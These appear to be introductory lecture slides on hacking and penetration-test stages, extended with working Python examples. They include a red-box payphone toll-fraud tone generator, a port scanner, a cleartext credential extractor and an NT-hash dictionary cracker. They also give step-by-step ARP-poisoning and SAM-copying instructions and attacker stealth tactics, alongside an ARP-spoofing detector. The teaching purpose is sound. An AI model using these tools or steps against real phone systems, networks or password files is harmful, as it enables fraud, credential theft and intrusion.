Hacking: What is it and how is it done?
Introduction to Cybersecurity
Slides by Raymond Borges
Outline
• Background
• Hacking 101
• The penetration test
  - Reconnaissance
  - Enumeration
  - Gaining access
  - Privilege escalation
  - Maintaining access
  - Stealth
• Conclusion
Background
Phone phreaks were some of the first hackers.
• Phreaking: the activity of a culture of people who study, experiment with, or explore telecom systems
• Blue box: a tone generator capable of producing the in-band signaling frequencies used to control phone trunks
Background
[Figure: the blue box built by Steve Wozniak, on display at the Computer History Museum, alongside the Captain Crunch whistle]
The Blue Box
How did the Blue Box work?
1. The user places a long-distance telephone call.
2. While the call is ringing, he sends the 2600 Hz tone down the line.
3. To the trunk, that tone signals that the caller has hung up (the local line itself stays up).
4. The trunk answers with a "ka-cheep" noise followed by silence: it is now waiting for routing digits.
5. Send a Key Pulse (KP), the telephone number, and a Start (ST) as multi-frequency tones.
6. You just made a free call: the billing equipment still sees only the original call.
Phreaking boxes!!!
• Blue: makes calls by generating the 2600 Hz tone followed by the KP and routing digits described above
• Red: generates the tones that simulate coins being inserted into a payphone
• Black: a small electronic circuit added to the called party's telephone; it keeps the line from signaling "answered", so the caller is never billed for the call
Make your own Red Box
1. Download any free tone generator, e.g. NCH Tone Generator
2. Create at least one 5₵, 10₵ or 25₵ tone sequence by combining 1.7 kHz and 2.2 kHz, e.g. 5₵ = one 66 ms burst of both tones together
3. Save the tone and play it back into the payphone microphone
4. Free calls!
Caveat: this only fools a payphone that accepts coin tones in-band from the handset audio path.
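An added example (not from the original slides) that implements steps 2 and 3 in Python instead of the NCH tone generator: it synthesizes the 1.7 kHz + 2.2 kHz bursts for each coin value, writes them to a WAV file for playback, and counts the bursts back out of the audio as a sanity check. The 66 ms nickel burst comes from the slide; the dime and quarter timings are the commonly documented payphone coin-tone patterns and are assumptions here, as is the 8 kHz sample rate.

```python
import io
import math
import struct
import wave

SAMPLE_RATE = 8000                 # telephone-grade audio (assumption)
TONE_A, TONE_B = 1700.0, 2200.0    # the two frequencies mixed into every coin burst

# Burst pattern per coin value: (burst_ms, gap_ms, number_of_bursts).
# 5 cents is the one-burst case the slide gives; the dime and quarter
# patterns are the commonly documented coin-tone timings (assumption).
COIN_PATTERNS = {
    5: (66, 0, 1),
    10: (66, 66, 2),
    25: (33, 33, 5),
}


def dual_tone(ms, amplitude=0.4):
    """Samples of TONE_A + TONE_B mixed at equal level for `ms` milliseconds."""
    n = int(SAMPLE_RATE * ms / 1000)
    return [
        amplitude / 2 * (math.sin(2 * math.pi * TONE_A * i / SAMPLE_RATE)
                         + math.sin(2 * math.pi * TONE_B * i / SAMPLE_RATE))
        for i in range(n)
    ]


def silence(ms):
    return [0.0] * int(SAMPLE_RATE * ms / 1000)


def coin_sequence(cents):
    """The burst/gap sequence a red box plays for one coin worth `cents`."""
    burst_ms, gap_ms, count = COIN_PATTERNS[cents]
    samples = []
    for k in range(count):
        samples += dual_tone(burst_ms)
        if k < count - 1:
            samples += silence(gap_ms)
    return samples


def to_wav_bytes(samples):
    """16-bit mono PCM WAV, ready to be saved and played back (step 3)."""
    pcm = b"".join(struct.pack("<h", int(max(-1.0, min(1.0, s)) * 32767)) for s in samples)
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(SAMPLE_RATE)
        w.writeframes(pcm)
    return buf.getvalue()


def count_bursts(samples, window=64, threshold=0.05):
    """Sanity check on the generated audio: count rising edges of the RMS
    energy over non-overlapping windows, i.e. the number of tone bursts."""
    bursts, above = 0, False
    for start in range(0, len(samples) - window + 1, window):
        chunk = samples[start:start + window]
        rms = math.sqrt(sum(s * s for s in chunk) / window)
        if rms > threshold and not above:
            bursts += 1
        above = rms > threshold
    return bursts


if __name__ == "__main__":
    for cents in (5, 10, 25):
        seq = coin_sequence(cents)
        with open(f"redbox_{cents}c.wav", "wb") as f:
            f.write(to_wav_bytes(seq))
        print(cents, "cents:", len(seq), "samples,", count_bursts(seq), "bursts")
```

The burst counter is the check a practitioner wants before trusting the file: the nickel, dime and quarter sequences must come back as 1, 2 and 5 bursts respectively.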
Hacking 101
Hacking is the investigation and exploitation of system vulnerabilities.
Hacking expertise varies; some categories are:
• Newbies: know the basic concepts but have little practice
• Cyberpunks: know the tools of the trade
• Coders: write the tools that automate hacks
• Cyber terrorists: threats to national security
Hacker Hats
• White hats: security professionals (defense)
• Black hats: crackers, the bad guys
• Grey hats: somewhere in between
The penetration test
Common steps in a pen test (or in a hack):
1. Reconnaissance
2. Scanning and enumeration
3. Gaining access
4. Escalation of privileges
5. Maintaining access
6. Covering tracks
Scanning
The steps of a scanning methodology are:
1. Identify live systems
2. Discover open ports
3. Identify the OS and services
4. Scan for vulnerabilities
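The first three scanning steps in Python, as an added example that is not part of the slides: a TCP connect() scan (what nmap's -sT does) for steps 1 and 2 and a banner grab for step 3, run against a throwaway listener on 127.0.0.1 so the whole thing works offline. The listener, its fake SSH banner and the port choices are constructed for the demo; step 4 (vulnerability scanning) is left to a real scanner.

```python
import socket
import threading


def start_listener(banner=b"SSH-2.0-OpenSSH_demo\r\n"):
    """Throwaway TCP service on 127.0.0.1 (ephemeral port) that sends a banner
    and hangs up; it stands in for a real host so the scan can run offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener was closed
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return port, srv


def reserve_closed_port():
    """Bind and immediately release an ephemeral port so the scan has a
    port that is known to be closed (constructed negative case)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def connect_scan(host, ports, timeout=0.3):
    """Steps 1-2: a TCP connect() scan. A completed handshake means open;
    a refused connection or a timeout means closed or filtered."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def grab_banner(host, port, timeout=1.0, nbytes=256):
    """Step 3: read whatever the service volunteers right after connect;
    the first line often names the product and version."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(nbytes)
        except socket.timeout:
            return b""


def scan_demo():
    """Run the scan against the local stand-in.
    Returns (open_ports_found, banner, open_port, closed_port)."""
    open_port, srv = start_listener()
    closed_port = reserve_closed_port()
    try:
        found = connect_scan("127.0.0.1", [closed_port, open_port])
        banner = grab_banner("127.0.0.1", open_port)
    finally:
        srv.close()
    return found, banner, open_port, closed_port


if __name__ == "__main__":
    found, banner, open_port, closed_port = scan_demo()
    print("open:", found, "(expected", open_port, "; closed:", closed_port, ")")
    print("banner:", banner)
```

A connect() scan completes the three-way handshake, so every probe lands in the target's logs; that is the trade-off behind nmap's default SYN scan and behind the passive-versus-active risk point made later in the deck.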
Gaining Access
• Once the known vulnerabilities have been enumerated...
• Learn how far exploitation of each one actually gets you
The keystone of security is authentication, and the most-used method is the password.
Password Attacks
• Passive online attack, e.g. a packet sniffer capturing a password sent in plaintext in network traffic
• Active online attack, e.g. password guessing
• Offline password cracking, e.g. stealing the password hashes and cracking them offline
• Keylogging, e.g. a hardware or software keystroke logger
Passive online attack
0. Target: http://www.httprecipes.com/1/2/forms.php (the login form used for this demo)
1. Run Wireshark
2. Apply the display filter http
3. Find the POST method
4. Follow the TCP stream
5. You have the username and password in the clear, provided the server isn't using HTTPS (SSL/TLS) or other encryption
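What step 5 yields, as an added example that is not from the slides: the reassembled stream is parsed in Python the way "Follow TCP Stream" shows it, and credential-looking fields are pulled out of the POST body (and out of GET query strings, which leak the same way). The stream bytes, field names and path are constructed for the example, not captured from httprecipes.com.

```python
import re
from urllib.parse import parse_qs

# Constructed sample of what "Follow TCP Stream" shows for one cleartext login
# session: a GET that leaks credentials in the query string, the POST from the
# slide's demo form, and the server replies. Not a real capture.
SAMPLE_STREAM = (
    b"GET /1/2/forms.php?uid=alice&pwd=guess1 HTTP/1.1\r\n"
    b"Host: www.httprecipes.com\r\n"
    b"\r\n"
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Length: 2\r\n"
    b"\r\n"
    b"ok"
    b"POST /1/2/forms.php HTTP/1.1\r\n"
    b"Host: www.httprecipes.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 23\r\n"
    b"\r\n"
    b"uid=alice&pwd=s3cret%21"
    b"HTTP/1.1 302 Found\r\n"
    b"Location: /1/2/welcome.php\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# Field names that usually carry a login identity or secret (heuristic).
CRED_FIELD = re.compile(r"user|uid|login|email|pass|pwd|pin", re.I)


def _parse_message(stream, pos):
    """Split one HTTP message starting at `pos` into
    (start line, headers, body, position of the next message), or None."""
    end = stream.find(b"\r\n\r\n", pos)
    if end == -1:
        return None
    lines = stream[pos:end].decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    body_start = end + 4
    length = int(headers.get("content-length", "0") or 0)
    body = stream[body_start:body_start + length]
    return lines[0], headers, body, body_start + length


def _credential_fields(query):
    parsed = parse_qs(query, keep_blank_values=True)
    return {k: v[0] for k, v in parsed.items() if CRED_FIELD.search(k)}


def extract_credentials(stream):
    """Walk every request in a reassembled cleartext stream and collect
    credential-looking fields from POST bodies and GET query strings."""
    found, pos = [], 0
    while (msg := _parse_message(stream, pos)) is not None:
        start, headers, body, pos = msg
        parts = start.split(" ")
        if len(parts) != 3 or parts[0].startswith("HTTP/"):
            continue                          # a response, not a request
        method, target = parts[0], parts[1]
        fields = {}
        if method == "POST" and headers.get("content-type", "").startswith(
                "application/x-www-form-urlencoded"):
            fields = _credential_fields(body.decode("latin-1"))
        elif method == "GET" and "?" in target:
            fields = _credential_fields(target.split("?", 1)[1])
        if fields:
            found.append({"method": method, "host": headers.get("host", ""),
                          "path": target.split("?", 1)[0], "fields": fields})
    return found


if __name__ == "__main__":
    for hit in extract_credentials(SAMPLE_STREAM):
        print(hit)
```

In Wireshark itself, the display filter http.request.method == "POST" narrows step 3 to the form submissions; the point of the parser is that nothing in the stream is hidden from anyone on the path when the transport is plain HTTP.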
Replay and Man-in-the-middle
When passwords can't be caught in plaintext:
• Man-in-the-middle
  - ARP poisoning
  - Session hijacking
• Replay attack
Cain and Abel (ARP poisoning)
1. Install Cain and Abel
2. Connect to a network
3. Select the Sniffer tab
4. Start the sniffer and select the network interface
5. Select Hosts at the bottom, press the + button to scan for hosts, then OK
6. Select the APR tab at the bottom and click in the top window
7. Press the + button, select the target IP, then hit OK
8. Hit Start APR, then select the Passwords tab (HTTP)
Cain and Abel (ARP poisoning): Man-in-the-middle (worked in Firefox 7)
• http://www.voddler.com/ (clueless of the attack)
• http://www.cnet.com/ (clueless of the attack)
• https://www.fxhome.com/ (invalid certificate)
• https://www.yahoo.com/ (invalid certificate)
• https://www.amazon.com/ (invalid certificate)
(With an invalid certificate, the attack worked in Internet Explorer 9 if the user continued)
• https://accounts.google.com (Gmail) (sometimes, *cookies)
• https://login.live.com (Hotmail)
Cain and Abel (ARP poisoning)
Secured (Internet Explorer and Firefox):
• http://www.facebook.com
• https://www.facebook.com
• https://www.paypal.com/
Firefox version 7: secured, detects the invalid certificate with no option to continue:
• https://www.paypal.com
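The defender's side of the APR procedure above, as an added example that is not part of the slides. What Cain sends are unsolicited ARP replies binding the gateway's IP to the attacker's MAC (and the victim's IP likewise, so traffic in both directions passes through the attacker), which is also why the HTTPS sites showed certificate warnings: the attacker has to substitute its own certificate. An arpwatch-style monitor that remembers each IP's first MAC catches both poison replies. The IPs, MACs and frames are constructed; the frame builder exists only to fabricate the sample capture.

```python
import struct

ETH_TYPE_ARP = 0x0806
ARP_REPLY = 2

# Constructed LAN: one gateway, one victim, one attacker (MACs are made up).
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "aa:bb:cc:00:00:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.10", "aa:bb:cc:00:00:10"
ATTACKER_MAC = "aa:bb:cc:00:00:66"


def _mac(s):
    return bytes.fromhex(s.replace(":", ""))


def _ip(s):
    return bytes(int(o) for o in s.split("."))


def _fmt_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def _fmt_ip(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet + ARP reply frame: "sender_ip is at sender_mac", sent to target.
    Used here only to fabricate the sample capture."""
    eth = struct.pack("!6s6sH", _mac(target_mac), _mac(sender_mac), ETH_TYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, ARP_REPLY,
                      _mac(sender_mac), _ip(sender_ip), _mac(target_mac), _ip(target_ip))
    return eth + arp


def parse_arp(frame):
    """(opcode, sender_mac, sender_ip, target_mac, target_ip), or None if not ARP."""
    if len(frame) < 42:
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return op, _fmt_mac(sha), _fmt_ip(spa), _fmt_mac(tha), _fmt_ip(tpa)


class ArpWatch:
    """Minimal arpwatch-style detector: remember the first MAC seen for each IP
    and alert whenever a later ARP reply rebinds that IP to a different MAC."""

    def __init__(self):
        self.table = {}      # ip -> mac
        self.alerts = []     # (ip, old_mac, new_mac)

    def feed(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return
        _, sender_mac, sender_ip, _, _ = parsed
        known = self.table.get(sender_ip)
        if known is None:
            self.table[sender_ip] = sender_mac
        elif known != sender_mac:
            self.alerts.append((sender_ip, known, sender_mac))
            self.table[sender_ip] = sender_mac   # track the flip so a flip-back alerts too


def constructed_capture():
    """Legitimate replies first, then the two poison replies of a full-duplex APR attack."""
    return [
        build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),    # gateway answers victim
        build_arp_reply(VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),    # victim answers gateway
        build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),   # "I am the gateway" -> victim
        build_arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),  # "I am the victim" -> gateway
    ]


def detect(frames):
    watch = ArpWatch()
    for frame in frames:
        watch.feed(frame)
    return watch.alerts


if __name__ == "__main__":
    for ip, old, new in detect(constructed_capture()):
        print(f"ALERT {ip} changed from {old} to {new}")
```

The same table-of-first-bindings logic is what a static ARP entry for the gateway enforces on the host itself, which is the simplest hardening against this class of attack on a small network.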
Active online attack (Guessing)
1. Your partner's, child's or pet's name, possibly followed by a 0 or 1 (because they're always making you use a number, aren't they?)
2. The last 4 digits of your social security number
3. 123 or 1234 or 123456
4. "password"
5. Your city, or your college football team's name
6. Date of birth: yours, your partner's or your child's
7. "god"
8. "letmein"
9. "money"
10. "love"
This list covered about 20% of passwords as of March 31, 2010, according to Lifehacker.com.
Offline password cracking
Passwords on Windows systems are stored as hashes in the SAM:
  C:\Windows\System32\config\ (the SAM and SYSTEM files; locked while Windows is running)
  C:\Windows\repair\ (backup copies)
Copy the SAM and SYSTEM files (the SYSTEM hive holds the boot key needed to decrypt the SAM): http://www.youtube.com/watch?v=SDsJbgl2J8E
Passwords on Linux are found in the shadow file: /etc/shadow
Crack the password hash files (e.g. with Cain and Abel)
Offline password cracking
1. Copy the SAM and SYSTEM files
2. Run Cain and Abel
3. Select the Cracker tab
4. Select LM & NTLM Hashes
5. Select the plus sign
6. Add the SAM file and the SYSTEM file
7. Copy the boot key, exit and paste it
8. Right-click and crack; LM hashes are stored by default only on versions before Vista, so on older systems start with LM
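The offline attack from the last two slides in Python, as an added example that is not part of the original deck, and one that also uses the guessing slide's wordlist: an NT hash is MD4 of the UTF-16LE password, so the block carries a pure-Python MD4 (hashlib's md4 is often unavailable on OpenSSL 3 builds) plus a dictionary attack over the Lifehacker top-10 entries, with the "append 0 or 1" mangling that slide describes. The user:hash dump is constructed; the hash for alice is the well-known NT hash of "password". LM hashes (DES-based) are not covered.

```python
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _f(x, y, z):
    return (x & y) | (~x & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


def md4(data):
    """MD4 (RFC 1320) in pure Python, processed 64-byte block at a time."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    rounds = (
        (_f, list(range(16)), (3, 7, 11, 19), 0),
        (_g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (_h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, order, shifts, k in rounds:
            for n, i in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[i] + k) & MASK, shifts[n % 4])
                a, b, c, d = d, a, b, c     # rotate registers: next op updates old d
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash = MD4 over the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16-le")).hex()


def mangle(word):
    """The guessing slide's observation: a name or word, maybe capitalized,
    maybe followed by 0 or 1 'because they make you use a number'."""
    yield word
    yield word.capitalize()
    for suffix in ("0", "1"):
        yield word + suffix
        yield word.capitalize() + suffix


def crack_nt_hashes(targets, wordlist):
    """Offline dictionary attack. NT hashes are unsalted, so each candidate
    is hashed once and checked against every account at the same time."""
    lookup = {}
    for word in wordlist:
        for cand in mangle(word):
            lookup.setdefault(nt_hash(cand), cand)
    return {user: lookup[h.lower()] for user, h in targets.items() if h.lower() in lookup}


# The guessing slide's list, minus entries that depend on the victim (names, DOB, SSN).
SLIDE_WORDLIST = ["password", "123", "1234", "123456", "god", "letmein", "money", "love"]

# Constructed dump in the user:hash form a SAM extraction tool prints. alice's
# entry is the well-known NT hash of "password"; the rest were made with nt_hash().
CONSTRUCTED_DUMP = {
    "alice": "8846f7eaee8fb117ad06bdd830b7586c",
    "bob": nt_hash("Letmein1"),
    "carol": nt_hash("correct horse battery staple"),
}


if __name__ == "__main__":
    print(crack_nt_hashes(CONSTRUCTED_DUMP, SLIDE_WORDLIST))
```

The lack of a salt is the practical lesson: one hash computation per candidate serves the whole dump, which is why a leaked SAM with thousands of accounts costs the attacker no more than a single one, and why the same unsalted property makes NT hashes usable directly in pass-the-hash attacks.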
Keyloggers
Record every keystroke the user makes.
• Software keyloggers can send passwords to remote computers (low risk for the hacker)
• Hardware keyloggers may be small dongles placed on the back of a desktop (high risk for the hacker: someone has to plant and later retrieve them)
Other forms of Gaining Access
Trojans and backdoors
• A Trojan can accomplish any number of things, from sending email, keylogging and stealing data to turning your computer into a zombie.
• Usually it provides an entrance and a form of maintaining access by implementing a backdoor.
Privilege Escalation
Once inside, a hacker can look for better ways of cracking the root or administrator password.
• A good tool that is somewhat famous in the hacker community is Metasploit.
• Metasploit is a semi-automated framework for finding and exploiting vulnerabilities that may lead to role elevation.
Stealth
Some tactics are:
1. Use passive attacks
2. Use proxies
3. Use the Tor anonymity network if possible
4. Hack from open or public access points
5. Use attack diversions when performing the real active attacks that could expose you
Conclusion
• Nothing is secure
• Security is a matter of the cost of attack vs. the value of the information
• Cost can be calculated in dollars and effort
• Active attack = high risk (for the attacker: it creates traffic and log entries that can be noticed)
• Passive attack = low risk
References
• Matt Walker, CEH All-in-One Exam Guide, 2011
• William Stallings, Lawrie Brown, Computer Security, 2008
• Jon Erickson, Hacking: The Art of Exploitation, 2008
• http://www.nch.com.au/tonegen/faq.html
• http://sectools.org/index.html
• http://www.lifehacker.com.au/2010/03/how-i%E2%80%99d-hack-your-weak-passwords/
• http://www.youtube.com/watch?v=7ezGTP99xSw
• http://www.wireshark.org/docs/wsug_html_chunked/ChWorkBuildDisplayFilterSection.html
• http://www.youtube.com/watch?v=C_trnrkkPUs&feature=related